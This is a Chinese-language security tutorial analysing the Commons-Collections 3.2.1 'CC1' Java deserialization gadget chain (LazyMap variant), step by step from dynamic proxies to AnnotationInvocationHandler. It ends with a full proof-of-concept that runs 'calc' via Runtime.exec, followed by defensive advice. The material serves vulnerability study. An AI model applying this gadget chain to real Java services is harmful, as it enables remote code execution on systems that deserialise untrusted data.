Java反序列化漏洞分析：CC1链LazyMap版<\/h1>

前置知识<\/h2>

JDK动态代理<\/h3>

JDK动态代理是一种在运行时创建代理对象并定义其行为的机制，常用于AOP、远程调用、权限控制、懒加载等场景。JDK提供了内置的动态代理支持，但只能代理接口。<\/p>

主要组成部分：<\/strong><\/p>

接口(Interface)<\/strong>：定义需要代理的方法<\/li>
真实实现类(Real Subject)<\/strong>：接口的具体实现，包含实际业务逻辑<\/li>
InvocationHandler<\/strong>：调用处理器接口，定义代理对象方法被调用时的执行逻辑<\/li>
代理对象(Proxy Object)<\/strong>：JDK在运行时生成，实现了目标接口的动态代理类<\/li> <\/ol>
示例代码：<\/strong><\/p>
import<\/span> java.lang.reflect.InvocationHandler;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Method;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Proxy;<\/span> <\/span><\/span> <\/span><\/span>\/\/ 定义接口 <\/span><\/span><\/span><\/span>interface<\/span> Service<\/span> {<\/span> <\/span><\/span> void<\/span> doSomething<\/span>();<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ 实现类 <\/span><\/span><\/span><\/span>class<\/span> RealService<\/span> implements<\/span> Service {<\/span> <\/span><\/span> public<\/span> void<\/span> doSomething<\/span>()<\/span> {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"RealService doing something..."<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ InvocationHandler 实现 <\/span><\/span><\/span><\/span>class<\/span> MyInvocationHandler<\/span> implements<\/span> InvocationHandler {<\/span> <\/span><\/span> private<\/span> final<\/span> Object target;<\/span> <\/span><\/span> <\/span><\/span> public<\/span> MyInvocationHandler<\/span>(<\/span>Object target)<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>target<\/span> =<\/span> target;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> Object invoke<\/span>(<\/span>Object proxy,<\/span> Method method,<\/span> Object[]<\/span> args)<\/span> throws<\/span> Throwable {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Before method call"<\/span>);<\/span> <\/span><\/span> Object result =<\/span> method.<\/span>invoke<\/span>(<\/span>target,<\/span> args);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"After method call"<\/span>);<\/span> <\/span><\/span> return<\/span> result;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Main<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> RealService realService =<\/span> new<\/span> RealService();<\/span> <\/span><\/span> Service proxy =<\/span> (<\/span>Service)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> Service.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Service.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> MyInvocationHandler(<\/span>realService)<\/span> <\/span><\/span> );<\/span> <\/span><\/span> proxy.<\/span>doSomething<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>关键点：<\/strong><\/p> InvocationHandler<\/code>的invoke<\/code>方法是一个反射调用方法，在反射前后可以添加其他处理逻辑<\/li> 调用代理对象执行方法时，会执行InvocationHandler<\/code>中的invoke<\/code>方法<\/li> <\/ul> 环境准备<\/h2> JDK版本：jdk8u65<\/li> Maven版本：maven-3.6.3<\/li> Commons-Collections版本：commons-collections-3.2.1<\/li> 需要将OpenJDK的sun<\/code>包拷贝到jdk8u65的src下以便调试<\/li> <\/ul> Maven依赖：<\/strong><\/p> <dependencies><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>commons-collections<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>commons-collections<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.2.1<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span><\/code><\/pre>漏洞链分析<\/h2> 1. Transformer组件分析<\/h3> InvokerTransformer<\/h4> InvokerTransformer<\/code>的transform<\/code>方法具备完整的反射条件：<\/p> public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span> <\/span><\/span> Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span> <\/span><\/span> return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception ex)<\/span> {<\/span> <\/span><\/span> \/\/ 异常处理 <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用方式：<\/strong><\/p> Runtime runtime =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span>InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span> <\/span><\/span> "exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>}<\/span> <\/span><\/span>);<\/span> <\/span><\/span>invokerTransformer.<\/span>transform<\/span>(<\/span>runtime);<\/span> <\/span><\/span><\/code><\/pre>ConstantTransformer<\/h4> ConstantTransformer<\/code>的transform<\/code>方法直接返回构造函数传入的对象：<\/p> public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span> <\/span><\/span> return<\/span> iConstant;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>ChainedTransformer<\/h4> ChainedTransformer<\/code>的transform<\/code>方法会遍历Transformer数组，将前一个Transformer的结果作为下一个Transformer的输入：<\/p> public<\/span> Object transform<\/span>(<\/span>Object object)<\/span> {<\/span> <\/span><\/span> for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> iTransformers.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span> <\/span><\/span> object =<\/span> iTransformers[<\/span>i].<\/span>transform<\/span>(<\/span>object);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> object;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>组合利用：<\/strong><\/p> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span>};<\/span> <\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span>chainedTransformer.<\/span>transform<\/span>(<\/span>null<\/span>);<\/span> <\/span><\/span><\/code><\/pre>2. LazyMap触发点<\/h3> LazyMap<\/code>的get<\/code>方法会调用factory.transform(key)<\/code>：<\/p> public<\/span> Object get<\/span>(<\/span>Object key)<\/span> {<\/span> <\/span><\/span> if<\/span> (!<\/span>super<\/span>.<\/span>map<\/span>.<\/span>containsKey<\/span>(<\/span>key))<\/span> {<\/span> <\/span><\/span> Object value =<\/span> factory.<\/span>transform<\/span>(<\/span>key);<\/span> <\/span><\/span> super<\/span>.<\/span>map<\/span>.<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span> <\/span><\/span> return<\/span> value;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> super<\/span>.<\/span>map<\/span>.<\/span>get<\/span>(<\/span>key);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用方式：<\/strong><\/p> HashMap<<\/span>Object,<\/span>Object><\/span> hashmap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span>Map decorateMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>hashmap,<\/span> chainedTransformer);<\/span> <\/span><\/span>decorateMap.<\/span>get<\/span>(<\/span>null<\/span>);<\/span> <\/span><\/span><\/code><\/pre>3. AnnotationInvocationHandler连接点<\/h3> AnnotationInvocationHandler<\/code>实现了InvocationHandler<\/code>接口，其invoke<\/code>方法会调用memberValues.get()<\/code>：<\/p> public<\/span> Object invoke<\/span>(<\/span>Object proxy,<\/span> Method method,<\/span> Object[]<\/span> args)<\/span> {<\/span> <\/span><\/span> String member =<\/span> method.<\/span>getName<\/span>();<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> Object result =<\/span> memberValues.<\/span>get<\/span>(<\/span>member);<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> return<\/span> result;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>利用方式：<\/strong><\/p> Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span>Constructor declaredConstructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span>declaredConstructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>InvocationHandler invocationHandler =<\/span> (<\/span>InvocationHandler)<\/span> declaredConstructor.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span> decorateMap);<\/span> <\/span><\/span>Map proxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> <\/span><\/span> invocationHandler <\/span><\/span>);<\/span> <\/span><\/span>proxyMap.<\/span>entrySet<\/span>();<\/span> <\/span><\/span><\/code><\/pre>4. 反序列化入口<\/h3> AnnotationInvocationHandler<\/code>的readObject<\/code>方法会操作memberValues<\/code>：<\/p> private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream ois)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> for<\/span> (<\/span>Map.<\/span>Entry<\/span><<\/span>String,<\/span> Object><\/span> memberValue :<\/span> memberValues.<\/span>entrySet<\/span>())<\/span> {<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>完整利用链<\/h2> 反序列化时调用AnnotationInvocationHandler.readObject()<\/code><\/li> readObject()<\/code>中调用memberValues.entrySet()<\/code><\/li> 如果memberValues<\/code>是代理对象，会调用InvocationHandler.invoke()<\/code><\/li> invoke()<\/code>中调用memberValues.get()<\/code><\/li> 如果memberValues<\/code>是LazyMap<\/code>，会调用factory.transform()<\/code><\/li> factory<\/code>是ChainedTransformer<\/code>，执行一系列transform()<\/code>调用<\/li> 最终通过反射执行恶意命令<\/li> <\/ol> 完整POC<\/h2> public<\/span> class<\/span> LazyFinalEXP<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span> <\/span><\/span> new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> <\/span><\/span> new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> <\/span><\/span> new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> <\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span> <\/span><\/span> HashMap<<\/span>Object,<\/span> Object><\/span> hashMap =<\/span> new<\/span> HashMap<>();<\/span> <\/span><\/span> Map decorateMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>hashMap,<\/span> chainedTransformer);<\/span> <\/span><\/span> <\/span><\/span> Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span> <\/span><\/span> Constructor declaredConstructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span> <\/span><\/span> declaredConstructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> <\/span><\/span> InvocationHandler invocationHandler =<\/span> (<\/span>InvocationHandler)<\/span> declaredConstructor.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span> decorateMap);<\/span> <\/span><\/span> Map proxyMap =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> <\/span><\/span> invocationHandler <\/span><\/span> );<\/span> <\/span><\/span> <\/span><\/span> Object poc =<\/span> declaredConstructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> proxyMap);<\/span> <\/span><\/span> serialize(<\/span>poc);<\/span> <\/span><\/span> unserialize(<\/span>"ser.bin"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"ser.bin"<\/span>));<\/span> <\/span><\/span> oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> Object unserialize<\/span>(<\/span>String Filename)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> FileInputStream(<\/span>Filename));<\/span> <\/span><\/span> Object obj =<\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> return<\/span> obj;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>关键点总结<\/h2> Transformer链<\/strong>：通过ChainedTransformer<\/code>组合多个Transformer<\/code>实现反射调用链<\/li> LazyMap触发<\/strong>：LazyMap.get()<\/code>方法会调用factory.transform()<\/code><\/li> 动态代理<\/strong>：通过代理对象触发InvocationHandler.invoke()<\/code><\/li> AnnotationInvocationHandler<\/strong>： invoke()<\/code>方法调用memberValues.get()<\/code><\/li> readObject()<\/code>方法触发整个调用链<\/li> <\/ul> <\/li> 序列化入口<\/strong>：AnnotationInvocationHandler<\/code>的readObject()<\/code>是反序列化的起点<\/li> <\/ol> 防御措施<\/h2> 升级Commons-Collections到安全版本(3.2.2+)<\/li> 使用JEP 290限制反序列化类<\/li> 使用安全管理器限制危险操作<\/li> 避免反序列化不可信数据<\/li> <\/ol>